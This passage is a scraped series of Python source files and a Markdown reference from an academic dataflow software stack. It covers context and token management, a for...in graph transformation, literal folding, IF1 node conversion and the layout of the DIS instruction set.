ContextManager(object):\n\tdef __init__(self, tokenizer):\n\t\tsuper(ContextManager, self).__init__()\n\t\tself.tokenizer = tokenizer\n\n\t\t##\n\t\t# Stores the contexts that have already been\n\t\t# created. This is needed in case multiple tokens\n\t\t# need to be sent to the same context (e.g. 
function call)\n\t\t##\n\t\tself.contextMap = {}\n\n\t\t##\n\t\t# Stores the old context and the destination\n\t\t# for restoring contexts.\n\t\t##\n\t\tself.restoreMap = {}\n\n\t## \n\t# Send a token to a different context.\n\t# Create this context first if it does not exist yet.\n\t# Further tokens from the same source (instruction, context) pair\n\t# will be sent to the same context.\n\t#\n\t# \\param token\n\t#\t\tThe token to change and send.\n\t# \\param inst\n\t#\t\tThe instruction that wants to change the token.\n\t# \\param dest\n\t#\t\tThe new destination of the token.\n\t# \\param retInst\n\t#\t\tThe instance to send the token to\n\t#\t\twhen restoring the context.\n\t# \\param binds\n\t#\t\tThe amount of tokens that will \n\t#\t\tbe bound to the context.\n\t# \\param restores\n\t#\t\tThe amount of tokens the context will \n\t#\t\tproduce before being deleted.\n\t##\n\tdef bindMany(self, token, inst, dest, retInst, binds, restores):\n\t\tkey = (inst.key, token.tag.cont)\n\t\tcont = None\n\t\tcore = None\n\n\t\tif key in self.contextMap:\n\t\t\ttup = self.contextMap[key]\n\t\t\tcont = tup[0]\n\t\t\tcore = tup[2]\n\t\t\ttup[1] -= 1\n\n\t\t\tif tup[1] <= 0:\n\t\t\t\tdel self.contextMap[key]\n\n\t\telse:\n\t\t\tcont, core = self.bind(retInst, None, token.tag.cont, restores)\n\t\t\tif binds > 1:\n\t\t\t\tself.contextMap.update({key : [cont, binds - 1, core]})\n\n\t\t\tfor key in inst.getLiterals():\n\t\t\t\tval = inst.getLiterals()[key]\n\t\t\t\ttag = Tag(dest, key, cont)\n\t\t\t\ttok = Token(val, tag)\n\t\t\t\tself.tokenizer.add(tok, core)\n\n\t\ttoken.tag.cont = cont\n\t\ttoken.tag.inst = dest\n\t\tself.tokenizer.add(token, core)\n\n \t##\n \t# Bind a new context to a given context and destination.\n \t# When a token with the new context encounters a context restore\n \t# operation, it will be bound to the old context, and new instruction.\n \t#\n \t# \\param destination\n \t#\t\tThe instruction to bind to the context.\n \t# \\param port\n \t#\t\tThe port to bind to the context.\n \t#\t\tNone if the port should not change.\n \t# \\param context\n \t#\t\tThe context to restore.\n \t# \\param restores\n \t#\t\tThe amount of tokens the context will produce.\n \t##\n \tdef bind(self, destInst, destPort, context, restores):\n \t\tcore = self.tokenizer.core.getCore()\n \t\tcont = self.tokenizer.core.contextCreator.get()\n \t\tself.restoreMap.update({cont : [destInst, destPort, context, restores]})\n \t\treturn (cont, core)\n\n\t##\n\t# Restore a token.\n\t#\n\t# In order to do this, we simply change the\n\t# destination and context of the token to those\n\t# found in the restoremap.\n\t##\n\tdef restore(self, token):\n\t\tcont = token.tag.cont\n\n\t\tif cont.core != self.tokenizer.core.identifier:\n\t\t\tself.tokenizer.add(token, cont.core)\n\t\t\treturn\n\n\t\tpair = self.restoreMap[cont]\n\n\t\tpair[3] -= 1\n\n\t\tif pair[3] <= 0:\n\t\t\tdel self.restoreMap[cont]\n\t\t\tself.tokenizer.core.contextCreator.restore(cont)\n\n\t\ttoken.tag.inst = pair[0]\n\t\ttoken.tag.cont = pair[2]\n\t\tif pair[1] is not None:\n\t\t\ttoken.tag.port = pair[1]\n\t\tself.tokenizer.add(token)\n\n##\n# Token Switcher\n#\n# The token switcher is responsible for storing and \n# sending tokens for a switch instruction.\n##\nclass Switcher(object):\n\tdef __init__(self, tokenizer):\n\t\tsuper(Switcher, self).__init__()\n\t\tself.tokenizer = tokenizer\n\n\t\t##\n\t\t# Store the tokens that\n\t\t# have not received a destination\n\t\t##\n\t\tself.storage = {}\n\n\t\t##\n\t\t# Store the known destination\n\t\t# of 
certain switch instructions.\n\t\t##\n\t\tself.destinations = {}\n\n\t##\n\t# Send a token to its destination.\n\t# Assumes the destination is present in the\n\t# destination map.\n\t#\n\t# \\param key\n\t#\t\tThe key of the switch.\n\t# \\param token\n\t#\t\tThe token to send.\n\t##\n\tdef send(self, key, token):\n\t\tdst = self.destinations[key]\n\t\ttoken.tag.inst = dst\n\t\tself.tokenizer.add(token)\n\t## \n\t# Store a token.\n\t#\n\t# \\param key\n\t#\t\tThe key of the switch.\n\t# \\param token\n\t#\t\tThe token to store.\n\t##\n\tdef store(self, key, token):\n\t\tif key in self.storage:\n\t\t\tlst = self.storage[key]\n\t\t\tlst.append(token)\n\t\telse:\n\t\t\tself.storage.update({key : [token]})\n\n\t##\n\t# Send all the stored tokens\n\t# that were waiting for a switch to be set.\n\t#\n\t# \\param key\n\t#\t\tThe key of the switch that was set.\n\t#\t\tAnd the context for which this was set.\n\t# \\param dst\n\t#\t\tThe destination for the tokens.\n\t##\n\tdef sendStored(self, key, dst):\n \t\tif key in self.storage:\n \t\t\tlst = self.storage[key]\n \t\t\tdel self.storage[key]\n\n \t\t\tfor token in lst:\n \t\t\t\ttoken.tag.inst = dst\n \t\t\t\tself.tokenizer.add(token)\n\t##\n \t# Set the destination of tokens for\n \t# a given (switch instruction, context) pair.\n \t# This will also release all the tokens that are\n \t# stored for this context.\n \t#\n \t# \\param inst\n \t#\t\tThe instruction that sent the switch.\n \t# \\param cont\n \t#\t\tThe context that received the setSwitch\n \t# \\param dst\n \t#\t\tThe destination of the tokens of the switch.\n \t##\t\n \tdef set(self, inst, cont, dst):\n \t\tkey = (inst.key, cont)\n \t\tself.destinations.update({key : dst})\n \t\tself.sendStored(key, dst)\n\n \t##\n \t# Send a token to the destination of a SwitchInstruction.\n \t# Store the token if the destination is currently unknown.\n \t# Only the instruction address of the token tag is modified.\n \t#\n \t# \\param token\n \t#\t\tThe token to switch\n \t# \\param inst\n \t#\t\tThe instruction that sent the token.\n \t##\n \tdef switch(self, token, inst):\n \t\tkey = (inst.key, token.tag.cont)\n\n \t\tif key in self.destinations:\n \t\t\tself.send(key, token)\n \t\telse:\n \t\t\tself.store(key, token)" }, { "alpha_fraction": 0.6996297240257263, "alphanum_fraction": 0.7078062295913696, "avg_line_length": 25.030887603759766, "blob_id": "d702ced31871c3c31099783c914edc1eefdfae38", "content_id": "3414858f2dce2340f8ca8b222c0d60412de34a44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6482, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DISc/backEnd/DVM/forin.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# forin.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF 
ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.forin\n# \\brief IGR for in structure changer\n#\n# This module contains functions to modify the IGR graph\n# in order to be able to compile the for...in compound node.\n##\n\nimport IGR\nimport IGR.node\n\n##\n# Stores the destination of the \n# context change for every split.\n##\nmap = {}\n\n##\n# See how many arrays a for...in node \n# generates internally.\n##\ndef getArrayCount(node):\n\tctr = 0\n\tfor port in node.subGraphs[1].exit.inputPorts:\n\t\tif port.isConnected():\n\t\t\tctr += 1\n\treturn ctr\n\n##\n# See if the generator accepts\n# an array or creates one.\n##\ndef acceptsArray(node):\n\tgen = node.subGraphs[0]\n\tif gen.entry in gen.nodes:\n\t\treturn len(node.subGraphs[0].nodes) == 2\n\telse:\n\t\treturn len(node.subGraphs[0].nodes) == 1\n\n# --------------- #\n# Return Subgraph #\n# --------------- #\n\n##\n# Replace the subgraphHeader of the return subgraph with\n# array instructions that will merge our inputs.\n# We also update the map with the idx -> instruction mapping.\n##\ndef addMerges(node):\n\tstart = node.subGraphs[0].exit.inputs\n\tentry = node.subGraphs[2].entry\n\n\t# Add merge outputs to the exit points of the body\n\tfor port in entry.outputPorts[start:]:\n\t\tmerge = IGR.createOperationNode(node.subGraphs[2], 'array')\n\n\t\tmerge.getOutputPort(0).targets = port.targets\n\t\tport.targets = []\n\n\t\tfor target in merge.getOutputPort(0).targets:\n\t\t\ttarget.source = merge.outputPorts[0]\n\n\t\tmap.update({port.idx : [None, merge]})\n\n\t# Shift the indices so that the array\n\t# is at element 0 with everything else behind it.\n\tarrIdx = node.inputs\n\tarrPort = entry.getOutputPort(arrIdx)\n\n\tentry.outputPorts[1:arrIdx + 1] = entry.outputPorts[:arrIdx]\n\tentry.outputPorts[0] = arrPort\n\n\tfor idx in xrange(0, arrIdx + 1):\n\t\tentry.outputPorts[idx].idx = idx\n\n\t# Attach any external input.\n\tfor port in entry.outputPorts[:arrIdx]:\n\t\tif port.isConnected():\n\t\t\tgenPort = node.subGraphs[0].getOutputPort(port.idx)\n\t\t\tgenPort.addTargets(port.targets)\n\t\t\tfor target in port.targets:\n\t\t\t\ttarget.source = genPort\n\n\tnode.subGraphs[2].removeNode(node.subGraphs[2].entry)\n\n# --------- #\n# Generator #\n# --------- #\n\ndef adjustGenerator(node):\n\tgen = node.subGraphs[0]\n\n\t# Remove the elements provided by scatter/range\n\tarrPort = gen.exit.getInputPort(node.inputs)\n\tdst = gen.exit.getInputPort(0)\n\tsrc = arrPort.source\n\tsrc.removeTarget(arrPort)\n\tarrPort.source = None\n\t\n\t# If we are dealing with a generated array\n\t# (instead of an external one), link the array\n\t# generator.\n\tsrc.addTarget(dst)\n\tdst.source = src\n\n\t# Get the arguments to the node linked to the\n\t# exit node (which will lead to the split)\n\tfor port in node.inputPorts:\n\t\tsrc = port.source\n\t\tidx = port.idx + 1\n\n\t\tdst = gen.exit.getInputPort(idx)\n\t\tsrc.removeTarget(port)\n\t\tsrc.addTarget(dst)\n\t\tdst.attach(src)\n\n\t\tentryPort = gen.entry.getOutputPort(port.idx)\n\t\ttargets = entryPort.targets\n\t\tentryPort.targets = []\n\n\t\tfor target in targets: target.source = 
src\n\t\tsrc.addTargets(targets)\t\n\n\tgen.removeNode(gen.entry)\n\n\n# ---- #\n# Body #\n# ---- #\n\n##\n# Adjust the ports of the body so that the array\n# elements are at port 0 and the other arguments after it.\n##\ndef shiftBodyPorts(node):\n\tentry = node.subGraphs[1].entry\n\tarrIdx = node.inputs\n\n\tarrPort = entry.getOutputPort(arrIdx)\n\tentry.outputPorts[1:arrIdx + 1] = entry.outputPorts[:arrIdx]\n\tentry.outputPorts[0] = arrPort\n\n\tfor idx in xrange(0, arrIdx + 1):\n\t\tentry.outputPorts[idx].idx = idx\n\n##\n# Follow the path through the body,\n# starting from the exit point and \n# add every node we encounter up to the entry.\n##\ndef duplicatePath(node, idx):\n\tsg = IGR.createCompoundSubGraph()\n\tsg.name = \"body_%d\" % idx\n\tnode.subGraphs.append(sg)\n\n\tentryNode = node.subGraphs[1].entry\n\tbodyPort = node.subGraphs[1].getInputPort(idx)\n\tcopyPort = sg.getInputPort(idx)\n\tbodyNode = bodyPort.source.node\n\tlst = [(bodyNode, bodyPort, copyPort)]\n\n\twhile lst:\n\t\tbodyNode, bodyPort, copyPort = lst.pop()\n\n\t\tif bodyNode is entryNode: \n\t\t\tIGR.connect(sg.entry, bodyPort.source.idx, copyPort.node, bodyPort.idx)\n\t\t\tcontinue\n\n\t\tcopyNode = bodyNode.copy(sg)\n\t\tsg.addNode(copyNode)\n\n\t\tIGR.connect(copyNode, bodyPort.source.idx, copyPort.node, bodyPort.idx)\n\n\t\tfor port in bodyNode.inputPorts:\n\t\t\tif port.acceptsLiteral():\n\t\t\t\tcopyNode.getInputPort(port.idx).attach(port.source)\n\t\t\telse:\n\t\t\t\tlst.append((port.source.node, port, copyNode.getInputPort(port.idx)))\n\n##\n# Duplicate the path for every out port that produces\n# an array.\n##\ndef splitBody(node):\n\tif getArrayCount(node) == 1:\n\t\tidx = node.inputs + 1\n\t\tnode.subGraphs[1].name = \"body_%d\" % idx\n\t\tnode.subGraphs.append(node.subGraphs[1])\n\telse:\n\t\tfor port in node.subGraphs[1].exit.inputPorts:\n\t\t\tif port.isConnected():\n\t\t\t\tduplicatePath(node, port.idx)\n\ndef addBodySinks(node):\n\tfor sg in node.subGraphs[3:]:\n\t\tidx = int(sg.name[5:])\n\t\tarr = map[idx]\n\t\tarr[0] = sg.entry\n\n# ------- #\n# General #\n# ------- #\n\ndef convertForIn(node):\n\tglobal map\n\tmap = {}\n\n\tnode.subGraphs[0].name = \"Generate\"\n\tnode.subGraphs[2].name = \"Return\"\n\n\taddMerges(node)\n\tadjustGenerator(node)\t\n\n\tshiftBodyPorts(node)\n\tsplitBody(node)\n\taddBodySinks(node)\n\n\tnode.map = map\n\ndef checkNode(node):\n\tif (isinstance(node, IGR.node.CompoundNode) and \n\t\tnode.type == 'forall'):\n\t\tconvertForIn(node)\n\ndef convert():\n\tIGR.traverse(\n\t\tcheckNode, \n\t\tlambda x : None,\n\t\tlambda x : None,\n\t\tFalse,\n\t\tlambda x : None,\n\t\tlambda x : None\n\t\t)" }, { "alpha_fraction": 0.7327340245246887, "alphanum_fraction": 0.7351458072662354, "avg_line_length": 26.817073822021484, "blob_id": "c4e94b436de7aece3a0537d4f600de7c0acf874e", "content_id": "5f225529f0e6a3dd57ba0f14d5073e14a48349a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4561, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DISc/backEnd/DVM/literals.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# literals.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the 
rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.literals\n# \\brief IGR Literal removal\n# \n# This module defines a few traversals\n# that remove literals from the IGR where\n# possible.\n##\n\nimport dvm\nimport dis\nimport IGR.node\nimport nodeConverter\nimport graphConverter\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## See if a node only contains literals\ndef isLit(node):\n\tif not node.inputPorts: return False\n\tfor port in node.inputPorts:\n\t\tif not port.acceptsLiteral():\n\t\t\treturn False\n\treturn True\n\n## Get all the literal inputs of a node.\ndef getInputs(node):\n\tres = []\n\tfor port in node.inputPorts:\n\t\tres.append(port.source.value)\n\treturn res\n\n##\n# Create a DIS program to execute a \n# single operation.\n##\ndef createOpStr(node):\n\tprog = dis.DIS(node.inputs)\n\tkey = nodeConverter.convertNode(prog, node)\n\tprog.linkStart(key)\n\tprog.linkStop(key)\n\treturn prog.generate()\n\n##\n# Create a DIS program to execute a\n# single function call.\n##\ndef createCallStr(node):\n\treturn graphConverter.convert(entryName = node.function)\n\n##\n# Add the result of executing\n# a node to all it's outputs.\n##\ndef transformNode(node, value):\n\tfor port in node.outputPorts:\n\t\tfor port in port.targets:\n\t\t\tIGR.addLiteral(value, port.node, port.idx)\t\n\n##\n# Calculate the value of a literal\n# and propagate it to the next nodes.\n##\ndef propagateLit(node):\n\tstr = None\n\tif isinstance(node, IGR.node.OperationNode):\n\t\tstr = createOpStr(node)\n\telif isinstance(node, IGR.node.CallNode):\n\t\tstr = createCallStr(node)\n\telif isinstance(node, IGR.node.SubGraphExitNode):\n\t\tval = getInputs(node)[0]\n\t\tnode.subGraph.reduce(val)\n\t\tnode.subGraph.removeNode(node)\n\t\tlog.info(\"Reduced trivial graph: %s\", node.subGraph)\n\t\treturn\n\telse:\n\t\tlog.error(\"Literals added to unsupported node: %s\", node)\n\t\treturn\t\n\n\tval = dvm.run(dis = str, inputs = getInputs(node))\t\n\tnode.subGraph.removeNode(node)\n\ttransformNode(node, val)\n\tlog.info(\"Reducing node '%s' to literal '%s'\", node, val)\n\n##\n# See if a call can be reduced to a \n# constant. 
If possible, propagate.\n##\ndef checkCall(node):\n\tgraph = IGR.getSubGraph(node.function)\n\tif graph.isTrivial():\n\t\ttransformNode(node, graph.value)\n\t\tnode.subGraph.removeNode(node)\n\t\tlog.info(\"Replacing call '%s' with constant '%s'\", node, graph.value)\n\n## See if a node can be removed, do so if possible.\ndef checkNode(node):\n\tif isLit(node):\n\t\tpropagateLit(node)\n\telif isinstance(node, IGR.node.CallNode):\n\t\tcheckCall(node)\t\n\n## See if we can remove a graph from the program.\ndef checkFunctionGraph(subGraph):\n\tif subGraph.isTrivial() and subGraph.isFunc:\n\t\tIGR.removeSubGraph(subGraph)\n\t\tlog.info(\"Removing trivial function graph %s\", subGraph)\n\n## See if we need to convert a subgraph to a constant\ndef checkCompoundGraphs(node):\n\tfor subGraph in node.subGraphs:\n\t\tif subGraph.isTrivial():\n\t\t\t# Remove the subgraph by a constant, followed by the exit node.\n\t\t\tconst = IGR.createConstantNode(subGraph, subGraph.value)\n\t\t\tsubGraph.entry = const\n\t\t\tsubGraph.nodes = [subGraph.exit, const]\n\t\t\tIGR.connect(const, 0, subGraph.exit, 0)\n\t\t\tlog.info(\"Replacing trivial graph %s by constant: %s\", subGraph, const)\n\n## Remove all operations that have predefined inputs.\ndef removeLiterals():\n\tIGR.traverse(\n\t\tcheckNode,\n\t\tlambda x: None,\n\t\tlambda x: checkNode(x.exit),\n\t\tFalse,\n\t\tlambda x: None,\n\t\tcheckCompoundGraphs\t\t\n\t)\n\tIGR.traverse(\n\t\tlambda x : None,\n\t\tcheckFunctionGraph,\n\t\tlambda x : None,\n\t\tFalse,\n\t\tlambda x : None,\n\t\tlambda x : None\n\t)" }, { "alpha_fraction": 0.7302007079124451, "alphanum_fraction": 0.7365800738334656, "avg_line_length": 25.561983108520508, "blob_id": "6389540240e8183dea2e4cc37bb0f9807bda909c", "content_id": "325380782e460ab936f716321fdede477904104e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6427, "license_type": "no_license", "max_line_length": 79, "num_lines": 242, "path": "/DISc/frontEnd/IF1/converter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# convert.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.convert\n# \\brief Node converter\n# \n# This module converts some of the IF1 operations\n# into different node types.\n# Other operations are adjusted to remove semantic\n# differences between IF1 and DIS.\n##\n\nimport IGR\nimport IGR.node\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# See if a port utilizes a correct lower bound\n# of an array.\n##\ndef checkLowerBound(port, valid):\n\tif (not port.acceptsLiteral() or port.source.value != valid): \n\t\tlog.info(\"Converting invalid lower bound: %s\", port)\n\t\tport.source.value = 0\n\n##\n# Remove the first input port of a node.\n# Update the indices of the other ports\n# to reflect this.\n##\ndef removeInputPort(node):\n\tnode.inputs -= 1\n\tnode.inputPorts = node.inputPorts[1:]\n\tfor port in node.inputPorts:\n\t\tport.idx -= 1\n\n##\n# Convert ABuild.\n#\n# This operation remains relatively unchanged,\n# we just remove the lower bound of the build operation.\n# We also emit a warning if the lower bound is not 0.\n##\ndef convertABuild(node):\n\tnode.operation = 'array'\n\tcheckLowerBound(node.inputPorts[0], 0)\n\tremoveInputPort(node)\n\n\tif node.inputs == 0:\n\t\tnode.subGraph.removeNode(node)\n\t\tfor port in node.outputPorts:\n\t\t\tfor port in port.targets:\n\t\t\t\tIGR.addLiteral([], port.node, port.idx)\n\n##\n# Convert AFill.\n# \\see convertABuild\n##\ndef convertAFill(node):\n\tnode.operation = 'arrCreate'\n\tcheckLowerBound(node.inputPorts[0], 0)\n\tremoveInputPort(node)\n\n##\n# Convert AGather.\n# Gathers only occur in the returns subgraph of \n# compound nodes. This has different semantics in DVM.\n#\n# The actual instruction that constructs the array is added \n# during the compilation of the compound node. Thus, we can remove\n# the gather operation if it only does this. 
If it also filters out a \n# part of the array, a prune instruction is added to do the actual filtering.\n##\ndef convertAGather(node):\n\tcheckLowerBound(node.inputPorts[0], 0)\n\tremoveInputPort(node)\n\n\tif node.inputs > 1:\n\t\tnode.operation = 'arrPrune'\n\telse:\n\t\tinputPort = node.inputPorts[0]\n\t\ttargets = [target for port in node.outputPorts for target in port.targets]\n\n\t\tinputPort.source.removeTarget(inputPort)\n\t\tinputPort.source.addTargets(targets)\n\t\tnode.subGraph.removeNode(node)\t\n\n##\n# Convert AScatter.\n#\n# There is no concept of a scatter operation in DVM.\n# Instead a Split operation provides this functionality.\n# The split is added when compiling the compound node.\n##\ndef convertAScatter(node):\n\tinputPort = node.inputPorts[0]\n\ttargets = [target for target in node.outputPorts[0].targets]\n\n\tinputPort.source.removeTarget(inputPort)\n\tinputPort.source.addTargets(targets)\n\tnode.subGraph.removeNode(node)\n\n\tfor target in targets:\n\t\ttarget.source = inputPort.source\n\n\tfor target in node.outputPorts[1].targets:\n\t\ttarget.source = None\n\t\n##\n# Convert ALimL\n#\n# A DVM array always has a lower bound of 0.\n# So we eliminate this node and add 0 as a literal.\n##\ndef convertALimL(node):\n\tfor port in node.outputPorts:\n\t\tfor port in port.targets:\n\t\t\tIGR.addLiteral(0, port.node, port.idx)\n\tfor port in node.inputPorts:\n\t\tport.source.removeTarget(port)\n\tnode.subGraph.removeNode(node)\t\n\n##\n# A lower bound of an array cannot be changed\n# in DVM. Thus we remove this operation.\n# We also return an error if the bound was \n# set to anything that is not 0\n##\ndef convertASetL(node):\n\tarrPort = node.inputPorts[0]\n\tbndPort = node.inputPorts[1]\n\tcheckLowerBound(bndPort, 0)\n\n\ttargets = [target for port in node.outputPorts for target in port.targets]\n\n\tif not bndPort.acceptsLiteral():\n\t\tbndPort.source.removeTarget(bndPort)\n\n\tarrPort.source.removeTarget(arrPort)\n\tarrPort.source.addTargets(targets)\n\tnode.subGraph.removeNode(node)\t\n\n## Convert a call operation to a call node.\ndef convertCall(node):\n\tsubGraph = node.subGraph\n\tfunction = node.inputPorts[0].source.value\n\tcallNode = IGR.node.CallNode(subGraph, function)\n\tsubGraph.replaceNode(node, callNode)\n\tremoveInputPort(callNode)\n\n##\n# Convert 'less chains'\n#\n# IF1 does not define a more or moreEq, \n# instead it adds a not after a < or =<\n# This method looks for such a chain and replaces\n# it if possible.\n##\ndef convertLessChain(node, replacement):\n\ttargets = node.outputPorts[0].targets\n\tnotNode = node.outputPorts[0].targets[0].node\n\n\tif not (\n\t\tlen(targets) == 1 and \n\t\tisinstance(notNode, IGR.node.OperationNode) and \n\t\tnotNode.operation == 'not'\n\t\t): return\n\n\tnode.operation = replacement\n\tnode.subGraph.removeNode(notNode)\n\tnode.outputPorts = notNode.outputPorts\n\tfor port in node.outputPorts:\n\t\tport.node = node\n\n## \n# Convert a less chain: \n# not smaller => greater or eq\n##\ndef convertLess(node):\n\tconvertLessChain(node, 'moreEq')\n\n## \n# Convert a less chain: \n# not smaller or eq => greater\n##\ndef convertLessEq(node):\n\tconvertLessChain(node, 'more')\n\nconversions = {\n\t'ABuild' : convertABuild,\n\t'AFill' : convertAFill,\n\t'AGather' : convertAGather,\n\t'AScatter' : convertAScatter,\n\t'ALimL' : convertALimL,\n\t'ASetL' : convertASetL,\n\t'Call' : convertCall,\n\t'less' : convertLess,\n\t'lessEq' : convertLessEq\n}\n\ndef checkNode(node):\n\tif (\n\t\tisinstance(node, IGR.node.OperationNode) 
\n\t\tand node.operation in conversions\n\t\t):\n\t\tconversions[node.operation](node)\n\ndef run():\n\tIGR.traverse(\n\t\tcheckNode, \n\t\tlambda x : None,\n\t\tlambda x : None,\n\t\tFalse,\n\t\tlambda x : None,\n\t\tlambda x : None\n\t\t)" }, { "alpha_fraction": 0.7319725751876831, "alphanum_fraction": 0.7375773787498474, "avg_line_length": 42.47272872924805, "blob_id": "e8307be8e82115b5b98cc699b6e180572ec89389", "content_id": "5643f9c6208b2b501875cb99e8264120f3c75fc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11954, "license_type": "no_license", "max_line_length": 372, "num_lines": 275, "path": "/doc/DIS.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "<!-- Written by Mathijs Saey at the VUB, all rights reserved -->\n\n# General {#General}\n\n[TOC]\n\n__This guide is deprecated! People looking for a complete DIS reference can always [contact me](https://github.com/mathsaey).__\n\nThis page defines the standard of DIS, the DVM Instruction Set. DIS is the only input accepted by DVM, and can be generated by an external tool. As the name might say, DIS simply contains the instruction set that DVM uses to execute programs. Simply said, DIS is a string representation of the DVM instruction memory.\n\n## The Instruction Memory. {#Memory}\n\nSeeing that DIS is a string version of the instruction memory, it might be handy to know what the instruction memory looks like. \n\nThe DVM instruction memory is divided into **chunks**, each of these chunks contains instructions that have certain properties. At the time of writing, the instruction memory contains 2 chunks, instructions that need to be matched by the context matcher and instructions that don't need to be matched.\n\nThe instructions that don't need to be matched are located in chunk 0, while those that need to be matched are located in chunk 1.\n\n# DIS file layout {#Layout}\n\nA DIS file contains 4 types of statements, seperated by newlines.\n\t* [Chunk declarations](#Chunks)\n\t* [Instruction definitions](#Instructions)\n\t* [Links between instructions](#Links)\n * [Literals of instructions](#Literals)\n\nBesides these, DIS can contain comments, a comment is started by using `$`\n\nThe following sections detail the exact nature of the other statements.\n\n## Chunks {#Chunks}\n\nLike the instruction memory, a DIS file is divided in chunks. A chunk simply contains all the instructions present in this chunk. A new chunk is started with the following statement:\n\n CHUNK <idx>\n\nWhere chunk is a keyword while idx is the index of the chunk. A chunk ends when a new chunk begins or when the file ends. It is not possible to nest chunks.\n\n## Links {#Links}\n\nA link allows us to define from-to relationships between instructions. A link is added in the following way:\n\n LINK <from> -> <to>\n\nWhere LINK is a keyword while from is the address (chunk, instruction, port) of the port on the source node while to is the address of the port on the to node.\n\nA port address is represented with the following syntax:\n\n <chunk> <instruction> <port>\n\n\nThus a link from port 0 of instruction 3 in chunk 0 to port 0 of instruction 1 in chunk 1 would look like this:\n\n LINK 0 3 0 -> 0 1 0\n\nLinks can occur anywhere in the file, and transcend chunk boundaries. 
However, a link should never precede the declaration of its source.\n\n## Instructions {#Instructions}\n\nAn instruction in DIS looks like this:\n\n    INST <type> <idx> <args>\n\nWhere idx is the index of the instruction in the chunk of memory, while type is the type of instruction we are creating. Args represents the arguments. These depend on the type of instruction.\n\n\n### Instruction Types\n\nThe following table defines the possible instruction types, their type code and the argument string they accept. Additional explanation on each of these types can be found below.\n\nType | Code | Args \n-----| -----|------\n[Sink](\\ref core::instruction::Sink) | SNK | `None`\n[Switch](\\ref core::instruction::Switch) | SWI | `<dstList>`\n[Constant](\\ref core::instruction::Constant) | CNS | `None`\n[ContextChange](\\ref core::instruction::ContextChange) | CHN | `<to> <return sink>`\n[ContextRestore](\\ref core::instruction::ContextRestore) | RST | `None`\n[OperationInstruction](\\ref core::instruction::OperationInstruction) | OPR | `<opCode> <inputs>`\n\n#### Sinks\n\nSinks 